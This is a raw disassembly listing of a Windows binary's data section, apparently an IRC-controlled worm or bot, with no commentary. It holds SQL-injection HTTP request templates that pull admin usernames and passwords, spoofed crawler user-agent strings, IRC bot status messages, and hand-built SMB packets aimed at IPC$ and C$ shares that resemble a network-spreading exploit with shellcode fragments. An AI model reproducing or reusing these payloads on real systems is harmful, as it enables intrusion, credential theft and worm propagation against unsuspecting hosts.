aMozilla4_75En db 'Mozilla/4.75 [en]',0 ; DATA XREF: .text:00437784�o
; .text:0043D990�o
align 10h
aMozilla5_0Co_5 db 'Mozilla/5.0 compatible ZyBorg/1.0 (wn.zyborg@looksmart.net; http:'
; DATA XREF: .text:00437780�o
db '//www.WISEnutbot.com)',0
align 4
aMozilla5_0Co_4 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)',0
; DATA XREF: .text:0043777C�o
align 8
aMozilla5_0Co_3 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; ODI3 Navigator'
; DATA XREF: .text:00437778�o
db ')',0
align 10h
aMozilla5_0Co_2 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.3.1.0'
; DATA XREF: .text:00437774�o
db ')',0
align 8
aMozilla5_0Co_1 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts'
; DATA XREF: .text:00437770�o
db '-MyWay; (R1 1.3); .NET CLR 1.1.4322)',0
align 10h
aMozilla5_0Co_0 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt+ .NET C'
; DATA XREF: .text:0043776C�o
db 'LR)',0
align 4
aMozilla4_0C_10 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser;'
; DATA XREF: .text:00437768�o
db ' .NET CLR 1.1.4322)',0
align 10h
aMozilla4_0Co_9 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4'
; DATA XREF: .text:00437764�o
; .text:0043D970�o
db '322; .NET CLR 1.0.3705)',0
align 10h
aMozilla4_0Co_8 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4'
; DATA XREF: .text:00437760�o
; .text:0043D96C�o
db '322)',0
align 4
aMozilla4_0Co_7 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: .text:0043775C�o
; .text:0043D908�o ...
align 10h
aMozilla4_0Co_6 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3'
; DATA XREF: .text:00437758�o
; .text:0043D964�o
db '705; .NET CLR 1.1.4322)',0
align 4
aMozilla4_0Co_5 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)',0
; DATA XREF: .text:00437754�o
; .text:0043D960�o
align 10h
aMozilla4_0Co_4 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows ME; Win 9x 4.90; H0108'
; DATA XREF: .text:00437750�o
db '18; AT&T CSM6.0)',0
align 4
aMozilla4_0Co_3 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)',0
; DATA XREF: .text:0043774C�o
; .text:0043D958�o
align 4
aMozilla4_0Co_2 db 'Mozilla/4.0 (compatible; MSIE 5.5; Windows ME)',0
; DATA XREF: .text:00437748�o
align 4
aGooglebot1_9_1 db 'Googlebot/1.9.1 (http://www.google.com/tools/bot.php)',0
; DATA XREF: .text:00437744�o
align 4
aMozilla4_0Co_1 db 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)',0
; DATA XREF: .text:00437740�o
; .text:0043D950�o
align 4
aGooglebot1_9Ht db 'Googlebot/1.9 (http://www.google.com/tools/bot.php)',0
; DATA XREF: .text:0043773C�o
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)',0
; DATA XREF: .text:00437738�o
; .text:0043D94C�o
aGooglebot2_1_0 db 'Googlebot/2.1 (http://www.google.com/bot.php)',0
; DATA XREF: .text:00437734�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)',0
; DATA XREF: .text:00437730�o
; .text:0043D948�o
aGooglebot2_0_0 db 'Googlebot/2.0 (http://www.google.com/bot.php)',0
; DATA XREF: .text:0043772C�o
align 4
aMicrosoftWebda db 'Microsoft-WebDAV-MiniRedir/5.1.2600',0 ; DATA XREF: .text:00437728�o
; .text:0043D944�o
aGooglebot2_1Ht db 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',0
; DATA XREF: .text:00437724�o
; .text:0043D93C�o
align 10h
aLynx2_8_4rel_1 db 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.6',0
; DATA XREF: .text:00437720�o
; .text:0043D940�o
align 4
aGooglebot2_0Ht db 'Googlebot/2.0 (+http://www.googlebot.com/bot.html)',0
; DATA XREF: .text:0043771C�o
align 10h
aFastWebcrawler db 'FAST-WebCrawler/3.8 (atw-crawler at fast dot no; http://fast.no/s'
; DATA XREF: .text:off_437718�o
db 'upport/crawler.asp)',0
align 4
asc_4381A8 db 0Dh,0Ah ; DATA XREF: sub_40DA0E+BB�o
db 0Dh,0Ah,0
align 10h
a@: ; DATA XREF: sub_40DB4B+CF�o
; sub_40DB4B+147�o ...
unicode 0, <@>,0
asc_4381B4: ; DATA XREF: sub_40DB4B:loc_40DBD1�o
; sub_416C0B+147�o ...
unicode 0, </>,0
aFtp db 'ftp',0 ; DATA XREF: sub_40DB4B+72�o
; sub_40DB4B:loc_40DD04�o ...
aHttp db 'http',0 ; DATA XREF: sub_40DB4B+62�o
; sub_40DB4B+1A2�o ...
align 4
asc_4381C4: ; DATA XREF: sub_40DB4B+34�o
; sub_416208+39A�o ...
unicode 0, <:>,0
aDoneSU db 'Done --> %s:%u',0 ; DATA XREF: .text:0040EFCB�o
align 4
aIframe db 'iframe',0 ; DATA XREF: .text:0040EC8B�o
align 10h
aFrame db 'frame',0 ; DATA XREF: .text:loc_40EC77�o
align 4
aEmbed db 'embed',0 ; DATA XREF: .text:loc_40E9D9�o
align 10h
aSrc db 'src',0 ; DATA XREF: .text:0040E7F1�o
; .text:0040EA8F�o ...
aImg db 'img',0 ; DATA XREF: .text:loc_40E73B�o
aGetS1UnionSe_1 db 'GET %s=-1+union+select+1,2,concat_ws(char(58),version(),user(),no'
; DATA XREF: .text:0040E6E2�o
db 'w()) HTTP/1.1',0Dh,0Ah
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aGetS1UnionSe_0 db 'GET %s=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+fr'
; DATA XREF: .text:0040E68B�o
db 'om+admin HTTP/1.1',0Dh,0Ah
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aGetS1UnionSele db 'GET %s=-1+union+select+database(),version(),system_user(),session'
; DATA XREF: .text:0040E634�o
db '_user(),current_user(),last_insert_id(),3,4,5,6,user()/* HTTP/1.1'
db 0Dh,0Ah
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aHttpSDSS db 'http://%s:%d%s%s',0 ; DATA XREF: .text:0040E54F�o
; .text:0040E8F2�o ...
align 4
aHttp_0 db 'http://',0 ; DATA XREF: .text:loc_40E4FD�o
; .text:loc_40E8A0�o ...
aHttpSDS db 'http://%s:%d%s',0 ; DATA XREF: .text:0040E4ED�o
; .text:0040E890�o ...
align 4
aHref db 'href',0 ; DATA XREF: .text:0040E44E�o
align 4
aRefresh db '"Refresh"',0 ; DATA XREF: .text:0040E202�o
align 10h
aMeta db 'meta',0 ; DATA XREF: .text:0040E1E6�o
align 4
aGetSHttp1_1Acc db 'GET %s HTTP/1.1',0Dh,0Ah ; DATA XREF: .text:0040E122�o
; .text:0040E34D�o ...
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHostSD db 'Host: %s:%d',0 ; DATA XREF: .text:0040E0F2�o
; .text:0040E320�o ...
aHostS db 'Host: %s',0 ; DATA XREF: .text:0040E0D3�o
; .text:0040E304�o ...
align 4
asc_438724: ; DATA XREF: .text:0040E08A�o
; sub_416C0B+175�o
unicode 0, <=>,0
aFailedToParse_ db 'Failed to parse.',0 ; DATA XREF: .text:0040DFFF�o
align 4
off_43873C dd offset off_42F434 ; DATA XREF: .text:off_42FBC0�o
; .text:0042FD34�o ...
dd 0
a_?avexception@ db '.?AVexception@@',0
off_438754 dd offset off_42F434 ; DATA XREF: .text:off_42FBD8�o
; .text:0042FC6C�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_438774 dd offset off_42F434 ; DATA XREF: .text:off_42FC78�o
; .text:0042FCBC�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
aInvalidVectorT db 'invalid vector<T> subscript',0 ; DATA XREF: sub_40F0E1+1E�o
a0_0_0_0 db '0.0.0.0',0 ; DATA XREF: sub_40F770+1A3�o
aSDoneWithDPack db '%s Done with %d pack(s)',0 ; DATA XREF: sub_40FA20+88�o
aPingTimeout?DD db 'Ping Timeout? (%d-%d)%d/%d',0 ; DATA XREF: .text:0040FBBE�o
align 4
aSLoginListComp db '%s Login List complete.',0 ; DATA XREF: sub_40FEC8+69�o
aIEmpty db '<%i> <Empty>',0 ; DATA XREF: sub_40FEC8+46�o
align 4
aISS@S db '<%i> %s!%s@%s',0 ; DATA XREF: sub_40FEC8+34�o
align 4
aSLoginList db '%s Login List:',0 ; DATA XREF: sub_40FEC8+F�o
align 4
aSS0S db '%s %s * 0 :%s',0Dh,0Ah,0 ; DATA XREF: sub_40FFB4+156�o
aSS db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_40FFB4+10C�o
; sub_41015C+41�o ...
aLeaving__ db 'leaving..',0 ; DATA XREF: sub_41012A+9�o
align 4
asc_438858 db 0Dh,0Ah,0 ; DATA XREF: sub_410234+A�o
align 4
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_410491+43�o
aSSS_0 db '%s %s : %s',0Dh,0Ah,0 ; DATA XREF: sub_4104F6+3F�o
; sub_4105DF+6B�o ...
align 4
dword_438878 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 1732520h
; DATA XREF: sub_410557+3F�o
dd 0A0Dh
dword_438890 dd 25207325h, 73252073h, 0A0Dh ; sub_410795+1F�o
dword_43889C dd 25207325h, 73252073h, 0D732520h, 0AhaError db 'Error',0 ; DATA XREF: sub_4108C7+56�o
align 4
aS_2 db '%s|',0 ; DATA XREF: sub_410930+34�o
off_4388B8 dd offset byte_4E4957 ; DATA XREF: sub_41099D:loc_410A7D�o
; sub_410AB7:loc_410BAA�o
aVista db 'Vista',0 ; DATA XREF: sub_41099D+D9�o
; sub_410AB7+EC�o
align 4
a2k3 db '2K3',0 ; DATA XREF: sub_41099D+C3�o
; sub_410AB7+D6�o ...
aXp db 'XP',0 ; DATA XREF: sub_41099D+B3�o
; sub_410AB7+C6�o ...
align 4
a2k db '2K',0 ; DATA XREF: sub_41099D+A3�o
; sub_410AB7+B6�o ...
align 10h
aMe db 'ME',0 ; DATA XREF: sub_41099D+8B�o
; sub_410AB7+9E�o ...
align 4
a98 db '98',0 ; DATA XREF: sub_41099D+7B�o
; sub_410AB7+8E�o ...
align 4
aNt db 'NT',0 ; DATA XREF: sub_41099D+6B�o
; sub_410AB7+7F�o ...
align 4
a95 db '95',0 ; DATA XREF: sub_41099D+58�o
; sub_410AB7+6C�o ...
align 10h
aSSCCC db '%s|%s|%c%c%c',0 ; DATA XREF: sub_410AB7+125�o
align 10h
aI_1 db '%i',0 ; DATA XREF: sub_410BF1+94�o
; sub_418614+1C7�o
align 4
asc_4388F4: ; DATA XREF: sub_410BF1+57�o
; sub_410BF1:loc_410CA0�o ...
unicode 0, <|>,0
aCCCCCCCCC db '%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_410CB4:loc_410DCA�o
; sub_410F23+E6�o
align 4
aDCCCCCCCCC db '|%d|%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_410CB4+106�o
align 8
aAbcdefghijklmn db 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXWYZ1234567890',0
; DATA XREF: sub_410CB4+34�o
; sub_410DDF+42�o ...
aSCCCCCCCCC db '%s%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_410DDF:loc_410F06�o
align 10h
aDSCCCCCCCCC db '|%d|%s%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_410DDF+117�o
align 4
a_2d db '%.2d',0 ; DATA XREF: sub_41101E+66�o
align 4
aP db 'P|',0 ; DATA XREF: sub_4110B0+2B�o
align 4
aSDone db '%s done',0 ; DATA XREF: sub_41112E+184�o
; sub_41130C+158�o ...
dword_4389B0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:00411F13�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_438A40 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00411F3E�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_438AF0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00411F63�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_438BD0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411A5E+58�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_0: ; DATA XREF: sub_411A5E+87�o
unicode 0, <C$>,0
a????? db '?????',0
dd 2 dup(0)
dword_438C38 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411A5E+27A�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_438CA8 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411A5E+2A9�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_438D50 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411A5E+395�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_438DD0 dd offset loc_401490+5 ; DATA XREF: sub_411A5E+3C3�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_438E68 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411A5E+2E6�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_438ED8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411A5E+311�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_438F50 dd 0 dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 3 dup(0)
dword_438FDC dd 7449BF1Ah dd 1, 77324321h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_438FF0: ; DATA XREF: sub_411A5E+13D�o
jmp short loc_438FF8
; ---------------------------------------------------------------------------
jmp short loc_438FFA
; ---------------------------------------------------------------------------
align 8
loc_438FF8: ; CODE XREF: .text:loc_438FF0�j
; DATA XREF: sub_411A5E+27�o ...
pop esp
pop esp
loc_438FFA: ; CODE XREF: .text:00438FF2�j
and eax, 50495C73h
inc ebx
and al, 0
; ---------------------------------------------------------------------------
dw 0
dword_439004 dd 1CEC8166h dword_439008 dd 0E4FF07h align 10h
word_439010 dw 43Bh ; DATA XREF: sub_401477:loc_4014D6�r
; sub_403B2C:loc_4054BA�r
word_439012 dw 1193h ; DATA XREF: sub_403B2C:loc_404DBC�r
word_439014 dw 3F5h ; DATA XREF: .text:004031AC�r
; sub_40B63F+124�r ...
byte_439016 db 2Ah ; DATA XREF: sub_403A63+2F�r
; sub_403A63+83�r ...
align 4
dword_439018 dd 14h ; sub_41B69D+3C�r
; ---------------------------------------------------------------------------
loc_43901C: ; DATA XREF: sub_412267+11�o
xor [eax+31h], bh
db 66h, 66h
pop ebx
xor eax, 5D34h
loc_439027: ; DATA XREF: sub_403B2C+13C5�o
; sub_403B2C+13EE�o ...
add [esi+35h], bl
cmp ah, [ebp+0]
loc_439030: ; DATA XREF: sub_401477+89�o
; sub_403B2C+19B7�o ...
sbb dh, [esi+7Ch]
std
inc eax
or ebx, [edi+0A40Dh]
loc_43903C: ; DATA XREF: sub_401160+BE�o
; sub_4130E5+24E�o ...
sbb dh, [esi+7Ch]
cld
inc ebp
or al, 0
loc_439043: ; DATA XREF: sub_403B2C+13CA�o
; sub_403B2C+13F3�o ...
add [esi+35h], bl
cmp ah, [ebp+0]
loc_43904C: ; DATA XREF: sub_419B2F+1BB�r
pop esp
retn 43h
; ---------------------------------------------------------------------------
dd offset dword_43C24C
; ---------------------------------------------------------------------------
inc eax
retn 43h
; ---------------------------------------------------------------------------
cmp dl, al
inc ebx
add [eax], dh
retn 43h
; ---------------------------------------------------------------------------
and al, 0C2h
inc ebx
add [eax], bl
retn 43h
; ---------------------------------------------------------------------------
dword_439068 dd 0B35B5E23h, 76DC0D71h, 66FBAC1Ch, 7B13F9BEh, 59E01F84h
; DATA XREF: sub_4120E9+46�o
; sub_412EB7+114�o ...
dd 28D185F4h, 22B558Ch, 558FF383h, 3D2431C9h, 9111FFD1h
dd 19F4DAA4h, 4F19D5h
dword_439098 dd 0B35B5E23h, 76DC0D71h, 66FBAC1Ch, 7B13F9BEh, 59E01F84h
; DATA XREF: sub_41B424+59�o
; sub_41D499+B0�o
dd 28D185F4h, 22B558Ch, 558FF383h, 3D2431C9h, 9111FFD1h
dd 19F4DAA4h, 4F19D5h
dword_4390C8 dd 0F16E7528h, 22C11D4Fh, 66CA843Bh, 6217FCA2h, 18EE0486h
; DATA XREF: sub_41B424:loc_41B4B8�o
; sub_41D499+C8�o
dd 33CD9FE9h, 126E62C9h, 59BBBA8Ch, 64792387h, 0C147F193h
dd 66A98DE4h, 0E31653FDh, 6070943Ch, 88AE0FF9h, 0CDB1CA0Bh
dd 3F5336FBh, 48BF0AE1h, 0FBC4978Dh, 117138D4h, 7F52DBFCh
dd 0D6877FBDh, 8BFCBB19h, 7324751Bh, 49C90CA7h, 5FFD4C23h
dd 0
dword_439130 dd 80000002h ; sub_414CF1+1EA�r ...
dword_439134 dd 0C749543Eh, 47E03974h, 2FD39D29h, 6108FB92h, 64EE1086h
; DATA XREF: sub_414983+1BD�o
; sub_414983+231�o ...
dd 28D7BBDCh, 33969C8h, 45AFC6A9h, 7D73359Bh, 0D2408794h
dd 28A281E4h, 0F12B7DD1h, 20h, 32h dup(0)
db 3 dup(0)
byte_439233 db 3Ah ; DATA XREF: sub_414FE3+2D�o
; sub_41B69D+AB�o ...
dd 40FD7C76h, 1051920Bh, 922FE8B3h, 0ECh, 0BFh dup(0)
dword_439540 dd 0A03F2A16h, 31F14B6Fh, 75DDEC45h, 264ABAB3h, 15AA45D8h
; DATA XREF: sub_40CDE2+607�o
; sub_4120E9+14E�o ...
dd 7588DFB9h, 497B4381h, 7DFABB0h, 415317DCh, 0ACADh
dword_439568 dd 0F7666D23h, 6BD61D6Eh, 28FB8214h, 15EC85h ; sub_414983+31B�o ...
dword_439578 dd 0FC606B3Eh, 70F6584Fh, 34FBB71Ch, 6002DAD1h, 5DF91F9Fh
; DATA XREF: sub_414983+236�o
; sub_414983+24F�o ...
dd 0
dword_439590 dd 0E061723Ah, 70D72B03h, 23FDA803h, 0 ; sub_414983+1DB�o ...
; ---------------------------------------------------------------------------
loc_4395A0: ; DATA XREF: sub_419B2F+214�o
; sub_41D499+110�o
pop esi
sub [edi], dh
stosb
inc edi
sbb edi, edx
xor [ebx-10h], eax
jmp dword ptr [eax]
; ---------------------------------------------------------------------------
dd 2205B0C6h, 5BA315DDh, 768989B8h, 46283199h, 68FF9C5h
dd 0
dword_4395C4 dd 0A5387F08h, 3AD11B42h, 77A7F546h, 2457EBC7h, 9FE40D8h
; DATA XREF: sub_403B2C+821�o
; sub_41D499+128�o
dd 728BD4E1h, 402830CFh, 188FE94h, 0
dword_4395E8 dd 0A23C294Ch, 30835B11h, 7EAEF846h, 2254BBC0h, 0AAB4ED0h
; DATA XREF: sub_419B2F+30�o
; sub_419F6A+C4�o ...
dd 778DDCB9h, 2E10209Eh, 19C4AFD3h, 212274A9h, 954F91C3h
dd 2CF9DBFFh, 0B14A15B8h, 3028D16Dh, 0D8F34BFDh, 95FA8A1Eh
dd 6D0573ADh, 5FFB48A7h, 0B8959D95h, 41362BF0h, 1A95BDh
dword_439638 dd 3D4Eh ; sub_403B2C+721�o ...
dword_43963C dd 0A65C5E29h, 4A12h ; sub_40F770+CD�o ...
dword_439644 dd 6A3D4Eh ; sub_403B2C+1110�o ...
dword_439648 dd 7C3D4Eh ; sub_415702+5�o ...
dword_43964C dd 643D4Eh ; sub_403B2C+FBE�o ...
dword_439650 dd 7C3D4Eh, 0 ; sub_419B2F:loc_419ED0�o ...
dword_439658 dd 0F86B7405h ; sub_412267+4FD�r
dd 71DB1350h, 77A6F844h, 7702FEDFh, 16E9188Dh, 0D383E3h
dd 21h dup(0)
db 3 dup(0)
byte_4396F7 db 1Eh ; DATA XREF: sub_412267+4CF�o
; sub_41D499+188�o
dd 46E16C7Eh, 663C20Ch, 0B2h, 0
dword_439708 dd 1F90h ; sub_403B2C+484�o ...
dword_43970C dd 0 dd 0FC777415h, 6FCB155Bh, 31B0AF14h, 7C03EC94h, 57F9589Ah
dd 0EDh, 21h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 8
dd 0EB3F355Ch, 31824913h, 76E6F10Dh, 7D04A79Ch, 0F915C7h
dd 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 10h
dd 0E766355Ch, 609F0150h, 3FEDB51Ch, 3C08EADFh, 158Ah
dd 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 8
dd 0FB7C7A09h, 2CDC194Eh, 36F7AF11h, 6602E7DFh, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 10h
dd 0FE607415h, 2CCB084Ch, 36F7AF11h, 6602E7DFh, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 8
dd 0E77D7E0Ah, 6CDC194Eh, 20F8A45Bh, 3C14FB94h, 0F7198Ah
dd 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 10h
dd 0F1616E1Eh, 2CDC0A56h, 23F0AD13h, 6008A785h, 8Eh, 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 8
dd 0E16C7E1Eh, 6CC10C46h, 68FBAA14h, 7C02F99Eh, 16E9188Dh
dd 89E2h, 21h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 10h
dd 0F67A770Fh, 2CD51747h, 28FBB11Ah, 3C14E795h, 138Bh
dd 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 8
dd 0A23F630Bh, 31834C13h, 3FF6B65Bh, 6008A7B8h, 8Eh, 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 10h
dd 0F66A690Ah, 6CD3154Dh, 23FBB65Bh, 3C14E795h, 0F7198Ah
dd 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 8
dd 0BD61635Dh, 6DD4014Eh, 34FFA31Ah, 7409E0DFh, 86h, 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 10h
dd 0A23E635Dh, 64CA480Dh, 2FB0A713h, 8EF9Fh, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 8
dd 0A237770Fh, 7BDA0F0Dh, 34F1EF3Ch, 96h, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0EB3F355Ch, 2C82491Bh, 25B0AE16h, 92h, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0F86B7405h, 71DB1350h, 77A6F844h, 7702FEDFh, 16E9188Dh
dd 0D383E3h, 21h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0FC777415h, 6FCB155Bh, 31B0AF14h, 7C03EC94h, 57F9589Ah
dd 0EDh, 21h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0EB3F355Ch, 31824913h, 76E6F10Dh, 7D04A79Ch, 0F915C7h
dd 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
